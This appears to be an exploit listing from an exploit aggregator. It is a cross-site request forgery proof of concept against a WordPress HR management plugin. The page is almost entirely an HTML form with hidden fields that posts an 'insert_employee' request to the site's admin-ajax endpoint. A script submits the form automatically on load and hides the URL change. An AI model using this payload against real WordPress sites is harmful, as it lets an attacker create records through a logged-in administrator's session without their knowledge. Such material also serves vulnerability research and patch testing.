Share
## https://sploitus.com/exploit?id=WPEX-ID:F6627A35-D158-495E-9D56-69405CFCA221
<html>
<body>
<form action="https://localhost/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="imgUrl" value="" />
<input type="hidden" name="fname" value="hacker" />
<input type="hidden" name="lname" value="man" />
<input type="hidden" name="emp_email" value="hacker@gmail.com" />
<input type="hidden" name="emp_status" value="Active" />
<input type="hidden" name="empId" value="test" />
<input type="hidden" name="emp_type" value="Full Time" />
<input type="hidden" name="date_of_hire" value="" />
<input type="hidden" name="department" value="Not Selected" />
<input type="hidden" name="source_of_hire" value="Not Selected" />
<input type="hidden" name="pay_type" value="Select" />
<input type="hidden" name="designation" value="Select" />
<input type="hidden" name="pay_rate" value="" />
<input type="hidden" name="work_phone" value="" />
<input type="hidden" name="blood_group" value="Select" />
<input type="hidden" name="father_name" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="other_email" value="" />
<input type="hidden" name="nationality" value="" />
<input type="hidden" name="marital_status" value="Single" />
<input type="hidden" name="hobbie" value="" />
<input type="hidden" name="address_1" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="spouse_name" value="" />
<input type="hidden" name="mother_name" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="date_of_birth" value="" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="driving_license" value="" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="address_2" value="" />
<input type="hidden" name="country" value="Select" />
<input type="hidden" name="post_code" value="" />
<input type="hidden" name="biography" value="" />
<input type="hidden" name="empsendmail" value="sendmail" />
<input type="hidden" name="action" value="innovs_hrm_ajax_request" />
<input type="hidden" name="param" value="insert_employee" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>